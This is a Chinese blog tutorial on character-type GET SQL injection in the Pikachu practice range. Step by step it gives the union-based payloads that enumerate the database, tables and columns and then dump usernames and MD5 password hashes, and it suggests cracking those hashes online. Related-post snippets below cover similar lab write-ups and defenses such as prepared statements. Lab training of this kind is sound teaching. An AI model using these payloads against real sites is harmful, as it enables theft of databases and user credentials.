NCNIPC--皮卡丘web靶场SQL注入(字符型注入)

已于 2022-03-16 20:20:35 修改
阅读量5.2k 收藏 6
点赞数 2
分类专栏: NCNIPC 文章标签: 安全 php
于 2022-03-16 20:15:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xulei1132562/article/details/123535039
版权

我们打开我们的靶场,我们带着同学简单练习一个字符型注入(get),点击SQL-Inject,点击字符型注入(get),我们直接就测试一下输入1’如图所示。
输入1’测试sql注入
点击“查询”按钮后,回显出报错了,报错信息为“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1”
这个报错信息就是典型的可能存在sql注入的信息,然后我们输入永真式1’or 1=1 #然后点击“查询”按钮,因为永真式恒成立,所以我们得到了全部信息。
在这里插入图片描述
我们输入

1'order by 1#

探测有回显多少个行数,输入

1'order by 1#

发现回显正常,然后输入

1'order by 2#

发现回显正常,如图所示,输入

1'order by 3#

发现回显错误

Unknown column '3' in 'order clause'

那么就说明后端数据库传递过来的数据一共回显两行。
输入1'order by 2#发现回显正常
接下来我们就利用union进行联合查询注入,我们输入

1'union select 1,database()#

然后点击查询,会回显数据库名
在这里插入图片描述
根据回显的信息,我们得到数据库名为pikachu,然后我们可以继续探测一下数据库用户名,输入

1'union select 1,user()#

根据回显root@localhost得到数据库用户名为root。
我们已知数据库名,接下来我们想要拿到数据表名,我们输入

1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')#

如图所示。
在这里插入图片描述
我们已经知道了数据表名,那么我们接下来就是要查询数据表中的列名,比如我们关注users表,那么我们在输入框输入

1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#

如图所示。
在这里插入图片描述
我们发现了我们比较关注的username与password,所以我们尝试拿到这两个的字段名,我们输入

1'union select (select group_concat(username) from users),(select group_concat(password) from users)#

如图所示。
在这里插入图片描述
拿到了password的密码的md5值(这个靶场是使用md5加密的),然后我们可以使用彩虹表破解,或者使用一些在线破解网站尝试破解,比如cmd5网站等,网址为https://www.cmd5.com,如图所示,我们sql的练习就先介绍到这里,还有很多其他类型的sql注入,大家可以自己尝试去做一下。
在这里插入图片描述

pikachu靶场 字符型注入sqlmap注入参数,针对GET方法)
wjwqp的专栏
03-02 2652
pikachu靶场 字符型注入可以用BurpSuit进行操作,可以获取到所有用户,但是要获取数据库的表内容我们还是用SQLMAP进行。 SqlMap注入中,上次是采用POST表单的注入,这次我们讲解GET方法取表的内容。 参数返回:GET /pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2 HTTP/1...
SQL注入:pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4130
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
pikachu靶场字符型注入(get)
ranioe的博客
12-08 3799
pikachu靶场字符型注入(get) 字符型注入 先找一个可以正确返回的内容 判断闭合条件 查询vince’报错 查询vince”没有报错 则说明是使用’闭合的。 把vince’构造可满足放回正确内容的语句 把vince’构造可满足放回正确内容的语句,在这个过程中可以利用and 1=1 和and 1=2 去判断是否构造成功 and 1=1 返回正常,and 1=2 查询不到用户。则说明构造成功了 查询字段数 查字段是否为2时,没有报错,查字段数是否为3时,报错。则说明字段数为2 查询回显位 语
Pikachu靶场-SQL注入
最新发布
sucker的博客
04-21 1112
搜索型SQL注入发生在网站的搜索功能模块中,由于开发者未对用户输入进行有效过滤,导致攻击者可通过构造恶意输入篡改SQL查询逻辑。UPDATE注入发生在应用程序将用户输入直接拼接到UPDATE语句中,允许攻击者修改数据库中的现有数据,可能导致数据篡改、权限提升或信息泄露。SQL注入中的INSERT注入发生在应用程序将用户输入不安全地拼接到INSERT语句中时,允许攻击者操纵数据库操作。是一种需要特定闭合符号的SQL注入类型,其核心在于识别并绕过SQL语句中的闭合符号(如单引号或括号),从而构造恶意查询。
pikachu靶场——字符型SQL注入
Mr_Liu___的博客
07-08 266
Pikachu(皮卡丘)靶场SQL注入
剁椒鱼头没剁椒的博客
12-14 5853
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
2022.7.28皮卡丘靶场SQL注入作业
weixin_44503202的博客
07-29 788
sqlmap注入
皮卡丘靶场-sql注入详解
Mr_helloword的博客
07-31 1934
皮卡丘靶场-sql注入 数字型注入 这里为post传参,所以我们需要抓包 抓包后发现id,我们一般在后面输入 ’ " \来测试有无注入,发现有sql语句报错,而且没有数字1,这和题目提示的数字型注入一样 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200730155448929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNz
pikachu靶场-SQL-Inject
braty_的博客
02-23 1562
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶场 SQL-inject
Al_1的博客
10-03 1118
数字型注入字符型注入,搜索型注入,xx型注入,增改注入,删除注入,请求头注入,布尔盲注,时间盲注,宽字节盲注
pikachu 字符型SQL注入
m0_61903602的博客
10-25 789
pikachu 靶场 sql 字符型
Pikachu靶场sql注入通关
oiadkt的博客
03-07 6794
pickchu—sql注入通关
sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)
weixin_36352432的博客
12-23 438
靶场地址:封神台方法一、首先尝试手工找注入点判断第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车,页面返回正常构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车,页面正常构造 ?id=1 and 1=1 order by 2 回车,页面正常构造 ?id=1...
Pikachu靶场SQL-Inject之字符型注入(基于报错)
witwitwiter的博客
05-09 728
Pikachu靶场SQL-Inject之字符型注入(基于报错) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 技巧思路: 在MYSQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。 select/insert/update/delete都可以使用报错来获取信息。 背景条件: 后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端。 updatexml():函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。 extractval
Pikachu靶场 字符型SQL注入
感谢关注
12-22 561
在Pikachu靶场里查询。,输入下面的命令,再输入。
pikachu闯关(二)---字符型注入
weixin_75034911的博客
07-05 1010
首先我们要知道字符型和数字型的区别:当我们输入的是整数并且不需要使用引号闭合时,为数字型,而字符型是当我们输入的内容为字符串类型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。所以字符型注入是需要使用单引号进行闭合的,然后在后面接上我们的payload。
NCNIPC-靶场介绍&&Django SQL注入(CVE-2021-35042)
03-01 2421
NCNIPC-中国科学院研究生院国家计算机网络入侵防范中心 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息安全管理办公室(以下简称国信安办)的依靠力量,承担和协调国内各种黑客事件的防范处理,协助国信安办完成关键部分的应急处理任务,协助解决社会上的应急/救援组织难以解决的网络安全疑难问题,是国家计算机网络应急处理体系中心的重要部门。 中心以保护我国网络空间安全为综旨,主要从事黑客防范技术的研究,占领网络安全的技术制高点,作为国家计算机网络与信息
pikachu字符型注入
m0_58887624的博客
11-09 2063
1.字符型注入吧。直接就 1' 报错了 2.存在字符型注入 3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据 4. 确定一下字段的显示位置嘛。 1' union select 1,2# 5.查一下数据库名 1' union select database(),version()# /**数据库名和版本**/ 只有数据库5.0以上的版本,才会存在i...
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 6135
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
渊龙sec靶场SQL注入漏洞
03-10
### 关于渊龙 Sec 靶场中的 SQL 注入漏洞及其解决方案 #### 定义与背景 SQL注入是一种常见的安全漏洞,允许攻击者通过操纵输入数据来执行未授权的数据库命令。在Web应用程序中,如果开发者未能正确处理用户输入,则可能导致此类漏洞的发生。 #### 渊龙 Sec 靶场环境下的具体表现形式 在渊龙Sec靶场环境中,可能存在多种场景模拟实际应用中存在的SQL注入风险。例如,在某些情况下,当使用MyBatis框架时,如果不恰当地构建查询字符串或者错误地配置动态SQL部分,就容易引发安全隐患[^1]。另外,像 Victor CMS 和 DedeCMS 这样的内容管理系统也可能因为特定参数(如`tag_alias`)缺乏足够的验证而暴露出SQL注入的风险点[^2][^3]。 #### 解决方案建议 为了有效防止SQL注入攻击并修复已知的安全缺陷: - **采用预编译语句**:对于所有涉及外部输入的数据访问逻辑,应尽可能使用PreparedStatement或其他支持预编译功能的方式替代简单的字符串拼接方法来组装SQL指令。 ```java String query = "SELECT * FROM users WHERE username=? AND password=?"; PreparedStatement pstmt = connection.prepareStatement(query); pstmt.setString(1, userInputUsername); pstmt.setString(2, hashPassword(userInputPassword)); ResultSet rs = pstmt.executeQuery(); ``` - **严格校验和过滤输入**:确保每一个来自客户端提交的信息都经过严格的正则表达式匹配或者其他有效的净化手段去除潜在危险字符;同时还要考虑设置合理的长度限制以及白名单机制只接受预期范围内的值。 - **最小权限原则**:运行数据库连接的应用程序应当遵循最低特权准则,即仅授予完成其工作所需的最少资源访问权能,从而减少一旦发生入侵事件后的损害程度。 - **定期审查代码库**:持续关注第三方依赖项更新情况,并及时修补官方发布的补丁包以应对新发现的问题;内部开发团队也需要养成良好的编程习惯并通过静态分析工具辅助检测可能存在的隐患部位。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全专家1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值